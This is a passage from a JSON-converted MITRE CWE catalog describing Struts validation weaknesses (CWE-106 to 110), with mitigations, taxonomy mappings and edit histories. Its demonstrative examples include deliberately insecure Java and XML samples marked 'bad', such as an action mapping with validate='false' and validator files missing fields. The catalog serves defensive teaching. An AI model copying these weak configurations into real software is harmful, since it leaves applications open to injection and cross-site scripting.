key=\\"prompt.name\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.address\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.city\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.state\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;[a-zA-Z]{2}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.zipcode\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;\\\\d{5}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.phone\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;^([0-9]{3})(-)([0-9]{4}|[0-9]{4})$&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.email\\"/&gt;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","",""]}}}}}],"Body_Text":["The validator XML file, validator.xml, provides the validation for the form fields of the RegistrationForm.","However, in the previous example the validator XML file, validator.xml, does not provide validators for all of the form fields in the RegistrationForm. Validator forms are only provided for the first five of the seven form fields. The validator XML file should contain validator forms for all of the form fields for a Struts ActionForm bean. The following validator.xml file for the RegistrationForm class contains validator forms for all of the form fields."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Form Field Without Validator"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"106":{"attr":{"@_ID":"106","@_Name":"Struts: Plug-in Framework not in Use","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"When an application does not use an input validation framework such as the Struts Validator, there is a greater risk of introducing weaknesses related to insufficient input validation.","Extended_Description":{"xhtml:p":["Unchecked input is the leading cause of vulnerabilities in J2EE applications. Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others.","Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Use an input validation framework such as Struts."},{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use an input validation framework such as Struts."},{"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":"Use the Struts Validator to validate all program input before it is processed by the application. Ensure that there are no holes in the configuration of the Struts Validator. Example uses of the validator include checking to ensure that:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Phone number fields contain only valid characters in phone numbers","Boolean values are only \\"T\\" or \\"F\\"","Free-form strings are of a reasonable length and composition"]}}}},{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":"Use the Struts Validator to validate all program input before it is processed by the application. Ensure that there are no holes in the configuration of the Struts Validator. Example uses of the validator include checking to ensure that:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Phone number fields contain only valid characters in phone numbers","Boolean values are only \\"T\\" or \\"F\\"","Free-form strings are of a reasonable length and composition"]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.action.ActionForm {}","xhtml:div":{"#text":"private String name;private String email;...public RegistrationForm() {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:div":{"#text":"private String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"XML"},"xhtml:div":{"#text":"&lt;struts-config&gt;&lt;/struts-config&gt;","xhtml:div":{"#text":"&lt;form-beans&gt;&lt;/form-beans&gt;...&lt;!-- ========================= Validator plugin ================================= --&gt;&lt;plug-in className=\\"org.apache.struts.validator.ValidatorPlugIn\\"&gt;&lt;/plug-in&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"&lt;form-bean name=\\"RegistrationForm\\" type=\\"RegistrationForm\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;set-property","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"property=\\"pathnames\\"value=\\"/WEB-INF/validator-rules.xml,/WEB-INF/validation.xml\\"/&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}]},"xhtml:br":""}}],"Body_Text":["However, the RegistrationForm class extends the Struts ActionForm class which does use the Struts validator plug-in to provide validator capabilities. In the following example, the RegistrationForm Java class extends the ValidatorForm and Struts configuration XML file, struts-config.xml, instructs the application to use the Struts validator plug-in.","The plug-in tag of the Struts configuration XML file includes the name of the validator plug-in to be used and includes a set-property tag to instruct the application to use the file, validator-rules.xml, for default validation rules and the file, validation.XML, for custom validation."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Plug-in Framework Not In Use"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"107":{"attr":{"@_ID":"107","@_Name":"Struts: Unused Validation Form","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An unused validation form indicates that validation logic is not up-to-date.","Extended_Description":"It is easy for developers to forget to update validation logic when they remove or rename action form mappings. One indication that validation logic is not being properly maintained is the presence of an unused validation form.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove the unused Validation Form from the validation.xml file."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data in the form fields using the private member variables. The RegistrationForm class uses the Struts validation capability by extending the ValidatorForm class and including the validation for the form fields within the validator XML file, validator.xml.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String name;private String address;private String city;private String state;private String zipcode;private String email;public RegistrationForm() {}...","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// no longer using the phone form field","// private String phone;","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;form-validation&gt;&lt;/form-validation&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;formset&gt;&lt;/formset&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;form name=\\"RegistrationForm\\"&gt;&lt;/form&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;field property=\\"name\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"address\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"city\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"state\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"zipcode\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"phone\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"email\\" depends=\\"required,email\\"&gt;&lt;/field&gt;","xhtml:div":[{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.name\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.address\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.city\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.state\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;[a-zA-Z]{2}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.zipcode\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;\\\\d{5}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.phone\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;^([0-9]{3})(-)([0-9]{4}|[0-9]{4})$&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.email\\"/&gt;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","",""]}}}}}}}}],"Body_Text":["However, the validator XML file, validator.xml, for the RegistrationForm class includes the validation form for the user input form field \\"phone\\" that is no longer used by the input form and the RegistrationForm class. Any validation forms that are no longer required should be removed from the validator XML file, validator.xml.","The existence of unused forms may be an indication to attackers that this code is out of date or poorly maintained."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Unused Validation Form"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"108":{"attr":{"@_ID":"108","@_Name":"Struts: Unvalidated Action Form","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Every Action Form must have a corresponding validation form.","Extended_Description":"If a Struts Action Form Mapping specifies a form, it must have a validation form defined under the Struts Validator.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Other","Note":"If an action form mapping does not have a validation form defined, it may be vulnerable to a number of attacks that rely on unchecked input. Unchecked input is the root cause of some of today\'s worst and most common software security problems. Cross-site scripting, SQL injection, and process control vulnerabilities all stem from incomplete or absent input validation."},{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Map every Action Form to a corresponding validation form.","An action or a form may perform validation in other ways, but the Struts Validator provides an excellent way to verify that all input receives at least a basic level of validation. Without this approach, it is difficult, and often impossible, to establish with a high level of confidence that all input is validated."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Unvalidated Action Form"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"109":{"attr":{"@_ID":"109","@_Name":"Struts: Validator Turned Off","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Automatic filtering via a Struts bean has been turned off, which disables the Struts Validator and custom validation logic. This exposes the application to other weaknesses related to insufficient input validation.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that an action form mapping enables validation. Set the validate field to true."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This mapping defines an action for a download form:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;action path=\\"/download\\"type=\\"com.website.d2.action.DownloadAction\\"name=\\"downloadForm\\"scope=\\"request\\"input=\\".download\\"validate=\\"false\\"&gt;&lt;/action&gt;","xhtml:br":["","","","","",""]}},"Body_Text":"This mapping has disabled validation. Disabling validation exposes this action to numerous types of attacks."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Validator Turned Off"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"The Action Form mapping in the demonstrative example disables the form\'s validate() method. The Struts bean: write tag automatically encodes special HTML characters, replacing a &lt; with \\"&amp;lt;\\" and a &gt; with \\"&amp;gt;\\". This action can be disabled by specifying filter=\\"false\\" as an attribute of the tag to disable specified JSP pages. However, being disabled makes these pages susceptible to cross-site scripting attacks. An attacker may be able to insert malicious scripts as user input to write to these JSP pages.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"110":{"attr":{"@_ID":"110","@_Name":"Struts: Validator Without Form Field","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Validation fields that do not appear in forms they are associated with indicate that the validation logic is out of date.","Extended_Description":{"xhtml:p":["It is easy for developers to forget to update validation logic when they make changes to an ActionForm class. One indication that validation logic is not being properly maintained is inconsistencies between the action form and the validation form.","Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"It is critically important that validation logic be maintained and kept in sync with the rest of the application. Unchecked input is the root cause of some of today\'s worst and most common software security problems. Cross-site scripting, SQL injection, and process control vulnerabilities all stem from incomplete or absent input validation."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"To find the issue in the implementation, manual checks or automated static analysis could be applied to the XML configuration files.","Effectiveness":"Moderate"},{"Method":"Manual Static Analysis","Description":"To find the issue in the implementation, manual checks or automated static analysis could be applied to the XML configuration files.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example shows an inconsistency between an action form and a validation form. with a third field.","Body_Text":["This first block of code shows an action form that has two fields, startDate and endDate.","This second block of related code shows a validation form with a third field: scale. The presence of the third field suggests that DateRangeForm was modified without taking validation into account."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DateRangeForm extends ValidatorForm {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String startDate, endDate;public void setStartDate(String startDate) {}public void setEndDate(String endDate) {}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"this.startDate = startDate;","attr":{"@_style":"margin-left:10px;"}},{"#text":"this.endDate = endDate;","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;form 